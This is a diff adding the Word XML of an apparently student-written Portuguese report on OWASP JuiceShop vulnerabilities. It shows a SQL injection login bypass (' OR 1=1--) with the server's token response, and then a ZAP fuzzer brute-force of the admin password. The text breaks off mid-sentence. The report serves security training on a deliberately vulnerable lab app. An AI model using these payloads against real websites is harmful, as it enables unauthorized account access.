+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se a ferramenta não identificar esta vulnerabilidade pode causar um erro de execução em runtime e, por exemplo, expor informações sobre a aplicacação (o stack tecnologico, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>) para um cliente/malfeitor.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>JuiceShop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>vulnerabilidades</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Login</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Um possível ataque de login para um website que não esteja implementado corretamente para validar os dados inseridos pelo utilizador é:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Aceder à </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>pagina</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de login</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Injetar código SQL que altere a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da DB, por exemplo, se a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Users</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE email = '' AND password = '';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> então colocar no email </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>`' OR 1=1--</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">`  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>vai</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> causar que qualquer input colocado no email não </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>importe</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mas sim o 1=1 vai aceitar como um “login válido” para o website e comentar o resto da validação.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ao executar no </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>JuiceShop</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é possível verificar a resposta 200 – OK com ainda mais informações “secretas”:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.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.qMvaPrOiY_J3Cd2DwC8yLET_8_cDkzDiVXdy-5WRFMuly5HA_4vrupy0kyUv46X7s93yb0n5k4FO7s412MzB2bqfAWGoquQ3Yl5gSOAou7omYdufbm447hyOsYspQD2yxDCNfdRcBIJKxuTro1sUWU558MXJEHVrS1UcuyqlA7w",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>"bid": 1,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>umail</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>": "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>admin@juice-sh.op</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">É possível obter o email </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do website, o que pode permitir outros tipos de ataque.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Zap</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> password</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Para descobrir a senha do website é possível seguindo os passos:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Aceder ao website com o Zap HUD</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ir para a página de login e submeter um pedido com o email </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:lang w:val="pt-PT"/>
+          </w:rPr>
+          <w:t>admin@juice-sh.op</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Através do histórico do Zap obter o pedido e adicionar um </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>fuzzer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ADEA235" wp14:editId="2158B95C">
+            <wp:extent cx="5400040" cy="2889885"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
+            <wp:docPr id="1194671196" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1194671196" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="2889885"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Deu-se uso a uma </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>regex</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>d{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>3}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> capaz de gerar todas as combinações para </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>adminXXX</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> em que XXX está compreendido entre 000-999</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Executando o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>fuzzer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> é possível verificar qual a palavra-passe correta através do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>http</w:t>
+      </w:r>
